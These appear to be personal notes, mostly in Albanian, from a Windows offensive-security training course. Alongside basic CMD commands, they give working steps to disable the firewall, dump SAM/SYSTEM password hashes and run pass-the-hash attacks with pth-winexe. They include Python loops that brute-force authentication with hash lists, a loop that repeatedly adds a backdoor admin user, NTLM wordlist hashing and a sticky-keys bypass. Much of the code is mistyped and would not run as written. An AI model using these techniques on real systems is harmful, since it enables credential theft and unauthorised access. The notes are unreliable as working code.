30.04.2018 WINDOWS Module Day-1
Fokusi i modulit eshte me punu me CMD
General Info:
ku instalohet OS
OS ?
explorer?
authentication:
hash algorithms
procesi i auth.
lsass
c = like root in linux
dir = like ls
cd = change directory
system32 = app jane owned by vet systemit NT authority
system32 = line /bin in linux
Commands:
C:\>.\calc
C:\>ping google.com
C:\> ping -n 10 google.com
C:\> ping -n 10 google.com -l 1500
C:\> .\whoami
C:\>ipconfig
C:\>netstat
Windows Firewall
NE win7
C:\>netsh firewall set opmode disable
C:\>netsh advfirewall ???
NE win10
NetSh Advfirewall set allprofiles state off ##To Turn Off:
##To Turn On: NetSh Advfirewall set allprofiles state on
##To check the status of Windows Firewall:
Netsh Advfirewall show allprofiles
Disa protocole:
RDP
SMB
VNC
easy acceess butoni ne login screen
C:\>utilman.exe
C:\Windows\System32\config> SAM file lokacioni ku ruhen passat, SYSTEM
Ushtrime:
verteto access ne internet / C:\>ping
verteto cfar ip ka pc / C:\>ipconfig
trego userat e sistemit local / C:\>net user
trego userat e sistemit deri ne domain / C:\>net user /domain
me shtu user/ C:\>net user testdr test /add
privilaget / C:\>net user testdr
ndrro passin / C:\>net user testdr newpass
delete user / C:\>net user testdr /delete
trego grupet / C:\>net localgroup
shto user ne group / C:\>net localgroup administrators user /add
stuxnet ##lloj sulmi
usb robert ducky ##lloj usb qe e njeh si tastjer
UAC = user account controle ## pop-up per run as
Disable UAC ?
Enable UAC ?
https://hashkiller.co.uk/ ##site per hash files
bashbanny ##usb tool, inject scripts locked
lan TURTLE usb ##usb
##Export SAM and system file
reg save hklm\sam c:\sam
reg save hklm\system c:\system
##tool per mi hap sma and system files
pwdump system sam (run in folder where sam and system file are located)
#####################################################################################################
02.05
#####################################################################################################
04.05
#####################################################################################################
07.05.2018
me win7
vector of the attack
pass the hash
1.
1. sigurohu qe exist admin dhe eshte enabled
2. sugrohu qe useri admin ka pass
3. export db sam dhe sys dhe nxerrne hash e admmin
2.
1. kontrollo qe smb eshte hap ne target pc
2. kontrollo qe target pc eshte domain apo workgroup
pasi qe pass dhe hash punon ne domain dhe local machine
3. identifiko pth-tool shkarkone, analizone
4. me njeran nga tools te pth realizo pass the hash dhe executo cmd
#####################################################################################################
9 maj 2018
Cd /Pth-toolkit
172.16.60.64
Porta 445
./pth-winexe
-U WORKGROUP/Administrator%LM:NTLM // 172. 16.60.64 cmd
Nano ntlmauth.py
Import os
#import socket
#Import sys
#Form netaddr import IPNetwork
# Import multiprocessing
For i in open(‘hash.txt’,’r’);
Hash=i.rstrip()
Os.system(‘./pth-winexe –U W WORKGROUP/Administrator%{} // 172. 16.60.64 cmd’ .format(hash))
#Ip=sys.argv[1]
#Port=445
#def connect();
#For i in IPNetwork(ip);
#Print i
#Try:
#S= socket.socket(socket.AF_INET, socket, SOCK_STREAM)
#s.settimeout(1)
#r=s.connect_ex((str(i), 445))
#if r ==0;
#os.system (‘./pth-winexe
-U WORKGROUP/Administrator%LM:NTLM // 172. 16.60.64 cmd’)
ose#print ‘{} TCP / 445 OPEN’, format(i)
#except:
#pass
#def threading():
#Pool=threadpool(multiprocessing.cpu_count())
#Pool.map(connect, IPNetwork(sys.argv[1])
#Pool.close()
#Pool.join()
#if _main_==’_main_’:
#Print ‘ ‘
#Threading()
#Print ‘ ‘
#connect()
Python ntlmauth.py
Python ntlmauth.py 172.16.60.1/24
Lm : aad3b435b51404eeaad3b435b51404ee
./pth-winexe –U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 //172.16.60.73 ‘net user q q /add’
Ose ‘taskkill /F /IM cmd.exe’
Cat fin.py
Import time
Import os
While true:
Os.system(./pth-winexe –U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 //172.16.60.73 ‘net user q q /add’)
Gjej nje wordlist me top 500 password dhe ktheje ne lm dhe ntlm hash.
Lm: aad3b435b51404eeaad3b435b51404ee
Kthimi i password ne ntlm:
import hashlib,binascii
hash = hashlib.new('md4', "password".encode('utf-16le')).digest()
print binascii.hexlify(hash)
import sys
import hashlib,binascii
for i in open(sys.argv[1]):
i = i.rstrip()
hash = hashlib.new('md4', i.encode('utf-16le')).digest()
print binascii.hexlify(hash)
python file.py wordlist.txt
Bej nje script ne bash ose gjuhe tjeter per te lexuar secilin nga password derisa ta gjej passwordin dhe te autentifikohet.
./pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 //172.16.60.64 cmd
#####################################################################################################
11 maj 2018
Tasklist – liston running processes
Start
Taskkill /F /PID 3420
Taskkill = Kill Dhe pkill
Taskkill /F /IM cmd.exe – me kill every connection ne cmd (challenge i ores kaluar)
Query user –tregon login user
Tasklist
Netstat – a
Powershell – mqs ne cmd nuk na pershtatet
Payload
Sudo msfconsole
Use exploit …
Taskkill.exe /F /PID 3420
Linux
Migrate –N notepad.exe
Aplikacioni process explorer
Ne Windows 7 - Administratorin me bo enable me i vene password dhe me i dhene password
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=<IP_Address>/32
#####################################################################################################
Sfida 1
me shtu 5 usera
2 prej tyre me kon administrators
me dokumentu nddrimin e passwordin dhe qysh me ndryshu kur password parametri nuk shhet
Sfida 2
Me export sam dhe system
me tentu mi lexu vlerat e hash
me dokumentu
Sfida 3
Sticky key me modifiku me nje applikacion qe nuk eshte cmd
Sfida 4
me tentu me identifiku a exist nje porces ku ne windows ruhen logs, nese po qysh aktivizohet
.#####################################################################################################
WIN7 Disable/Enable SMB1 with PowerSHELL
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 –Force
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 1 -Force
Disable/Enable SMB1 with Registry
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
0 = Disabled
1 = Enabled
Server 2012 and 2008
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 –Force
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 1 –Force